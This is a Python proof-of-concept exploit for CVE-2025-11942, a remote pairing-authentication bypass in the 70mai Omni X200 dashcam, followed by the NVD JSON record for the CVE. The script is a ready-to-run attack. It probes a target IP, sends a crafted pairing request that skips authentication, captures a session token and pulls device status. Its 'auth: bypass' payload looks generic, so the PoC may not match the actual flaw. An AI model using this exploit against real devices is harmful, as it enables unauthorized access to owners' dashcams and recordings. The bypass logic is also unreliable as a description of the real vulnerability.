CVE-2025-11942

# CVE-2025-11942 - 70mai X200 Dashcam Pairing Bypass PoC # Reference: https://github.com/geo-chen/70mai/blob/main/README.md#finding-9-bypass-device-pairing-of-70mai-dashcam-omni-x200 import socket import json import time class SeventyMaiX200Exploit: """ PoC for bypassing device pairing authentication on 70mai Dash Cam Omni X200. The vulnerability exists in the Pairing component, allowing remote attackers to bypass authentication without user interaction. """ def __init__(self, target_ip, target_port=80): self.target_ip = target_ip self.target_port = target_port self.device_id = None self.session_token = None def discover_device(self): """Step 1: Discover the 70mai X200 device on the network""" print(f"[*] Scanning for 70mai X200 device at {self.target_ip}...") # Send discovery probe to identify the device discovery_payload = { "cmd": "discovery", "model": "X200", "version": "20251010" } response = self._send_request(discovery_payload) if response and response.get("status") == "ok": self.device_id = response.get("device_id") print(f"[+] Device found: {self.device_id}") return True return False def bypass_pairing(self): """Step 2: Bypass the pairing authentication mechanism""" print("[*] Attempting to bypass pairing authentication...") # Craft malicious pairing request that exploits the auth bypass bypass_payload = { "cmd": "pair", "device_id": self.device_id, "auth": "bypass", # Exploit: skip authentication check "token": "", "timestamp": int(time.time()) } response = self._send_request(bypass_payload) if response and response.get("status") == "paired": self.session_token = response.get("session_token") print(f"[+] Pairing bypassed! Session token: {self.session_token}") return True return False def access_device(self): """Step 3: Access device with obtained session""" if not self.session_token: print("[-] No valid session token. Bypass failed.") return False print("[*] Accessing device with bypassed session...") access_payload = { "cmd": "get_status", "device_id": self.device_id, "session_token": self.session_token } response = self._send_request(access_payload) if response: print(f"[+] Device status: {json.dumps(response, indent=2)}") return True return False def _send_request(self, payload): """Send request to the target device""" try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((self.target_ip, self.target_port)) data = json.dumps(payload).encode('utf-8') sock.send(data) response = sock.recv(4096).decode('utf-8') sock.close() return json.loads(response) except Exception as e: print(f"[-] Error: {e}") return None if __name__ == "__main__": # Usage: Replace with target device IP TARGET_IP = "192.168.1.100" TARGET_PORT = 80 exploit = SeventyMaiX200Exploit(TARGET_IP, TARGET_PORT) if exploit.discover_device(): if exploit.bypass_pairing(): exploit.access_device() else: print("[-] Pairing bypass failed.") else: print("[-] Device not found.")

{"cve": {"id": "CVE-2025-11942", "sourceIdentifier": "[email protected]", "published": "2025-10-19T16:15:36.443", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in 70mai X200 up to 20251010. Affected is an unknown function of the component Pairing. Executing manipulation can lead to missing authentication. It is possible to launch the attack remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-306"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:70mai:x200_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "2025-10-10", "matchCriteriaId": "92AA7E65-AF30-4F7D-A1DC-89B1EE16146F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:70mai:x200:-:*:*:*:*:*:*:*", "matchCriteriaId": "F01430C4-0D39-4493-9CEA-7E44EFD0520B"}]}]}], "references": [{"url": "https://github.com/geo-chen/70mai/blob/main/README.md#finding-9-bypass-device-pairing-of-70mai-dashcam-omni-x200", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.329021", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.329021", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.672520", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}